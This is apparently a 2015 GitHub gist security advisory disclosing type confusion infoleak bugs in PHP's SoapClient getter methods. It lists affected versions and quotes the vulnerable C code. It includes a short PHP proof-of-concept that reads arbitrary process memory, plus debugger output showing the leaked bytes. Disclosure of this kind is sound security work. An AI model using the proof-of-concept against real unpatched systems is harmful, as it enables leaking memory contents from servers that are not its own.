Skip to content

Instantly share code, notes, and snippets.

@chtg
Last active August 29, 2015 14:17
Show Gist options
  • Save chtg/a5aee007a55d46f009aa to your computer and use it in GitHub Desktop.
Save chtg/a5aee007a55d46f009aa to your computer and use it in GitHub Desktop.
Type Confusion Infoleak Vulnerabilities in SoapClient

Type Confusion Infoleak Vulnerabilities in SoapClient

Taoguang Chen <@chtg> - Write Date: 2015.3.1 - Release Date: 2015.3.20

Four type confusion vulnerabilities were discovered in SoapClient object's some methods that can be abused for leaking arbitrary memory blocks.

Affected Versions

Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits

This vulnerability was disclosed by Taoguang Chen.

Description

PHP_METHOD(SoapClient, __getLastRequest)
{
	zval **tmp;
	
	if (zend_parse_parameters_none() == FAILURE) {
		return;
	}

	if (zend_hash_find(Z_OBJPROP_P(this_ptr), "__last_request", sizeof("__last_request"), (void **)&tmp) == SUCCESS) {
		RETURN_STRINGL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp), 1);
	}
	RETURN_NULL();
}

The Z_STRVAL_P macro lead to looking up an arbitrary valid memory address, and return a string via a doubles-type or integer-type zval that start from this memory address. If the memory address is an invalid memory position, it should result in a crash.

The Z_STRLEN_PP macro for accessing str.len member from the zvalue_value union, and return string's length. For integers the Z_STRLEN_PP macro is generally return 1, so a integer-type ZVAL can collide a string of length 1. The size of a double is 8 bytes, so on 32bit system a double-type ZVAL can collide a string of any length

The very similar bugs exists in SoapClient object's __getLastResponse(), __getLastRequestHeaders(), and __getLastResponseHeaders() methods.

Proof of Concept Exploit

The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.14.

<?php

$z = new SoapClient(null, array('location' => "", 'uri' => ""));
$str = '';
for ($i = 0x100351e3d; $i < 0x100351e3d + 25; $i++) {
    $z->__last_request = $i;
    $str .= $z->__getLastRequest();
}
var_dump($str);

?>

Test the PoC on the command line, then output some memory blocks:

$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test.php
Process 6366 launched: '/usr/bin/php' (x86_64)
string(25) "UH??AWAVSPI??I??H????
                                 H"
Process 6366 exited with status = 0 (0x00000000) 
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment